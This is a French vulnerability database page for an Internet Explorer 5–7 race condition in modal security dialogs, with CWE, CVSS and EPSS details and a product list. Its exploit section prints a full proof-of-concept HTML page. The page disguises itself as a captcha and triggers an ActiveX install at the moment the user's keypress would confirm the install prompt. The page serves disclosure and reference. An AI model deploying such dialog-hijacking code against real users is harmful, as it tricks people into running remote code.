Faiblesses connexes
CWE-ID |
Nom de la faiblesse |
Source |
CWE-362 |
Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') The product contains a concurrent code sequence that requires temporary, exclusive access to a shared resource, but a timing window exists in which the shared resource can be modified by another code sequence operating concurrently. |
|
Métriques
Métriques |
Score |
Gravité |
CVSS Vecteur |
Source |
V2 |
5.1 |
|
AV:N/AC:H/Au:N/C:P/I:P/A:P |
[email protected] |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 27744
Date de publication : 2006-04-25 22h00 +00:00
Auteur : Matthew Murphy
EDB Vérifié : Yes
source: https://www.securityfocus.com/bid/17713/info
Internet Explorer is prone to a remote code-execution vulnerability through exploiting a race-condition when displaying modal security dialog boxes.
This issue may be exploited to cause users to inadvertently allow remote-code to be executed.
<HEAD>
<TITLE>Internet Explorer ActiveX Installation Vulnerability</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<SCRIPT>
function doInstallControl() {
document.body.innerHTML +=
"<OBJECT CLASSID=\"clsid:928626A3-6B98-11CF-90B4-00AA00A4011F\" TYPE=\"application/x-oleobject\" CODEBASE=\"http://activex.microsoft.com/activex/controls/museum/MSSurVid.cab#Version=1,2,0,7\" WIDTH=\"325\" HEIGHT=\"250\">\r\n" +
"<PARAM NAME=\"SurroundRect\" VALUE=\"0,0,325,250\">\r\n" +
"<PARAM NAME=\"Image\" VALUE=\"ritetree.jpg\">\r\n" +
"</OBJECT>";
document.getElementById("captcha").focus();
}
function doWaitEntry() {
if (event.keyCode == 78 || event.keyCode == 110) {
doInstallControl();
}
}
</SCRIPT>
<FORM ACTION="" METHOD="GET">
Please enter the text you see on the left:<BR><BR>
<B>on3l1y6y8y5y</B> <INPUT TYPE="text" ID="captcha" ONKEYPRESS="doWaitEntry()">
</FORM>
</BODY>
Products Mentioned
Configuraton 0
Microsoft>>Ie >> Version 5
Microsoft>>Ie >> Version 5.0
Microsoft>>Ie >> Version 5.0
Microsoft>>Ie >> Version 5.0
Microsoft>>Ie >> Version 5.0.1
Microsoft>>Ie >> Version 5.0.1
Microsoft>>Ie >> Version 5.0.1
Microsoft>>Ie >> Version 5.0.1
Microsoft>>Ie >> Version 6.0
Microsoft>>Ie >> Version 6.0
Microsoft>>Internet_explorer >> Version 5.0
Microsoft>>Internet_explorer >> Version 5.0.1
Microsoft>>Internet_explorer >> Version 5.0.1
Microsoft>>Internet_explorer >> Version 5.0.1
Microsoft>>Internet_explorer >> Version 5.0.1
Microsoft>>Internet_explorer >> Version 5.0.1
Microsoft>>Internet_explorer >> Version 5.5
Microsoft>>Internet_explorer >> Version 5.5
Microsoft>>Internet_explorer >> Version 5.5
Microsoft>>Internet_explorer >> Version 5.5
Microsoft>>Internet_explorer >> Version 6.0
Microsoft>>Internet_explorer >> Version 7.0
Microsoft>>Internet_explorer >> Version 7.0
Références